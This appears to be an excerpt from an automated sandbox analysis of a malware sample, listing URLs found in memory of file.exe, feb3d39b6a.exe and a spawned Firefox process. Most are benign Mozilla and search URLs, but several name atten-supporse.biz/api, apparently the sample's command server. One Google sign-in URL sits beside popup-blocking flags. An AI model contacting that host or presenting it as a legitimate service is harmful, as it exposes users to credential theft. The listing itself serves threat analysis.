Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000023.00000003.3209291549.00000132C23B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3297565804.00000132C22F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3303931550.00000132C3B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258400388.00000132B9D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3291034654.00000132BDC58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3294052745.00000132BDE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258400388.00000132B9DD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA20F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3266008650.00000132BAEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2376000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3253578763.00000132B7BFC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3281670424.00000132BBA64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3262853359.00000132BA903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C2376000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3263225865.00000132BAA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3266008650.00000132BAECD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCF70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB475000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285460751.00000132BCE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C23B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C23F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000023.00000003.3140371807.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261062715.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000023.00000003.3209291549.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000023.00000003.3209291549.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000023.00000003.3209291549.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000023.00000003.3140371807.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261062715.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000023.00000003.3140371807.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261062715.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttps://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c
Source: file.exe, file.exe, 00000000.00000002.2618534099.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateapp.update.checkOnlyInstance.enabledPREF_APP_UPDATE_NO_WINDOW_
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCF62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3266858592.00000132BAFA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3228925027.00000132BBEE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6ABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3283033515.00000132BBE4D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3284059595.00000132BCC8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3228925027.00000132BBEA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3281670424.00000132BBABA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB365000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3262853359.00000132BA903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AA9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3285902389.00000132BCF70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261762897.00000132BA793000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C23B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3284661125.00000132BCD7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000023.00000002.3285902389.00000132BCF62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul%
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulPanelUI._onNotificationButtonEvent(even
Source: file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618365714.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3303931550.00000132C3B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3303931550.00000132C3B6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000023.00000002.3303203265.00000132C2B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258234904.00000132B9C70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.catranslations-panel-from-labeltranslations-panel-to-labelbrowser.topsites
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000023.00000002.3298965968.00000132C23CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3303203265.00000132C2BB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA20F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C23CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3287630311.00000132BD1C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000023.00000002.3238991466.00000132AC460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orghttps://monitor.firefox.comhttps://support.mozilla.orgtestPermissionFromPr
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB424000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB46A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etpresource://search-extensions/amazondotcom/amazondotcom%40sear
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.b
Source: feb3d39b6a.exe, 00000016.00000003.3287085381.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3234618879.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3207291870.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/
Source: feb3d39b6a.exe, 00000013.00000003.3072644403.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3046875375.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3280658869.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3033374446.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3047109889.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3072213446.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3046584930.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3005504175.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3278865021.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3078878997.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3033026272.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3005300210.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3005248474.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3156363925.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3033744363.0000000000F75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/3
Source: feb3d39b6a.exe, 00000013.00000003.3078690137.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3072000215.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2977685689.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/C
Source: feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/L
Source: feb3d39b6a.exe, 00000016.00000003.3160404403.0000000000F74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/_
Source: feb3d39b6a.exe, 00000016.00000002.3328020081.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119400538.0000000000F74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api?/
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiD
Source: feb3d39b6a.exe, 00000016.00000002.3328020081.0000000000F93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiR
Source: feb3d39b6a.exe, 00000016.00000002.3328020081.0000000000F93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apin
Source: feb3d39b6a.exe, 00000013.00000003.3270730206.0000000000F86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apitW
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/c
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/f
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/~
Source: feb3d39b6a.exe, 00000013.00000003.3033326578.00000000055D9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3096594731.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3269645415.00000000055D2000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3045991842.00000000055DA000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3071802109.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3344090498.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3151443466.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2977665839.00000000055DA000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2978686091.00000000055D8000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2978405456.00000000055D8000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3151443466.00000000055DA000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3095967786.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3032985887.00000000055D9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3096292702.00000000055DA000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiicrosoft
Source: firefox.exe, 00000023.00000003.3227061861.00000132C27B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3227061861.00000132C27AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000023.00000003.3227061861.00000132C27B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000023.00000002.3302865830.00000132C279C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3208780144.00000132C279C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3303931550.00000132C3B23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000023.00000002.3240579668.00000132B60AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000023.00000002.3240579668.00000132B60AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000023.00000002.3281670424.00000132BBABA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261762897.00000132BA737000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000023.00000002.3299612052.00000132C2437000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpA
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsgetCanApplyUpdates
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeshandleUpdateFailure
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/PrivateBrowsingUtils.sys.mj
Source: feb3d39b6a.exe, 00000016.00000003.3211134500.000000000579B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
